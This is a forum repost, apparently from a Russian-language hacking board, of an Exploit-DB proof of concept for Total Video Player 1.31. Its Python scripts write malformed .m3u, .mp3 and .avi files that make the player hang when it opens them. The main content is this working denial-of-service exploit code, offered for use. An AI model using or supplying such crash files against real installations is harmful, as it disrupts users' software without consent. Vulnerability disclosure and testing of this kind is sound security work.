Exploit Total Video Player 1.31 - '.m3u' Crash (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19265
Проверка EDB
  1. Пройдено
Автор
0DEM
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2012-06-18
Total Video Player 1.31 - '.m3u' Crash (PoC)
Код:
# Exploit Title: Total Video Player 1.31 .m3u Crash Poc 
# Date: June 17 2012  
# Exploit Author: 0dem
# Vendor Homepage: http://www.effectmatrix.com/
# Software Link: http://download.cnet.com/Total-Video-Player/3000-2139_4-10552696.html
# Version: V1.31
# Tested on: Windows XP SP 3
# Description:   Total Video Player has no correct input handling and will hang, 
#   when trying to open malformed .m3u files. .mp3 and .avi files are affected too

# --- m3u -----------------------------------------------
#!/usr/bin/python
junk = "#EXTM3U\n"
junk += "#EXTINF:666, 0dem, 0dem\n"
junk += "c:\\A"

file = open("PoC.m3u","w")
file.writelines(junk)
file.close()

# --- mp3 -----------------------------------------------
#!/usr/bin/python
junk = "\x41" * 100
file = open("PoC.mp3","w")
file.writelines(junk)
file.close()

# --- avi -----------------------------------------------
#!/usr/bin/python
junk = "\x41" * 100
file = open("PoC.avi","w")
file.writelines(junk)
file.close()
 
Источник
www.exploit-db.com

Похожие темы